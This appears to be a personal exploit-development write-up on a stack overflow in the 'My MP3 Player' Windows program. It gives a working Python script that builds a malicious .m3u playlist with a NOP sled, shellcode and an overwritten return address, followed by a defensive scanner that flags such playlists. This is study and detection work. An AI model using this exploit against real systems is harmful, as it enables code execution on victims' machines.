My MP3 Player - Stack Overflow
Hack/Windows 2016. 6. 4. 22:53

There are really no protection mechanisms on this one. It's extremely easy. After this I should do the ones with protections enabled.

EIP started changing from 1032 bytes on.

ASLR isn't enabled on the other modules either, but there was no jmp esp gadget. So I just NOP-sledded the buffer, put the shellcode in, and exploited it.

import struct

# pack a 32-bit address as little-endian bytes
p = lambda x: struct.pack("<L", x)

# shellcode from the post, kept as a bytes literal so it is unchanged on write
shellcode = b"\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x69\x21\x21\x01\x68\x67\x73\x61\x72\x68\x20\x73\x30\x6e\x89\xe1\xfe\x49\x0b\x31\xc0\x51\x50\xff\xd7"

payload = b"\x90" * 100                      # NOP sled at the start of the buffer
payload += shellcode
payload += b"\x90" * (1024 - len(payload))   # pad the buffer out to 1024 bytes
payload += p(0x18e404)                       # value that lands in EIP: a stack address inside the NOP-padded buffer

# write the playlist in binary mode so no byte of the payload is translated
with open("test.m3u", "wb") as f:
    f.write(payload)

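From the defender's side, the layout above (one entry far longer than any real path, a run of 0x90 bytes, control bytes from the packed address) is exactly what a scanner can key on. The following is an added example, not code from the post: it flags .m3u entries with that shape. The thresholds and both sample playlists are my own constructed assumptions; the crafted sample uses int3 (0xcc) bytes as a stand-in for shellcode.

```python
import re

# Assumed thresholds (my own choice, not from the post): playlist entries are
# paths or URLs, so the 1024-byte entry that crashes the player is far outside
# anything a legitimate playlist contains.
MAX_ENTRY_LEN = 512
MIN_SLED_LEN = 16
_SLED_RE = re.compile(rb"\x90{%d,}" % MIN_SLED_LEN)
_ALLOWED_CTRL = {0x09, 0x0d}  # tab and CR are legitimate in a text playlist


def scan_m3u(data: bytes) -> list:
    """Return (line_no, finding, detail) tuples for one .m3u file's raw bytes."""
    findings = []
    for no, line in enumerate(data.split(b"\n"), 1):
        line = line.rstrip(b"\r")
        if not line or line.startswith(b"#"):
            continue  # blank lines and #EXTM3U / #EXTINF directives
        if len(line) > MAX_ENTRY_LEN:
            findings.append((no, "overlong entry", len(line)))
        m = _SLED_RE.search(line)
        if m:
            findings.append((no, "nop sled", len(m.group(0))))
        # non-ASCII bytes are normal in UTF-8 paths; only count control bytes
        ctrl = sum(1 for b in line if b < 0x20 and b not in _ALLOWED_CTRL)
        if ctrl:
            findings.append((no, "control bytes", ctrl))
    return findings


def is_suspicious(data: bytes) -> bool:
    return bool(scan_m3u(data))


# Constructed samples: a normal playlist, and a crafted one mirroring the
# post's layout (sled, code, padding to 1024 bytes, 4-byte address) with
# int3 bytes standing in for shellcode.
BENIGN = b"#EXTM3U\r\n#EXTINF:123,Song\r\nC:\\Music\\song.mp3\r\n"
CRAFTED = b"\x90" * 100 + b"\xcc" * 40
CRAFTED += b"\x90" * (1024 - len(CRAFTED)) + b"\x04\xe4\x18\x00"

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN), ("crafted", CRAFTED)):
        print(name, scan_m3u(sample))
```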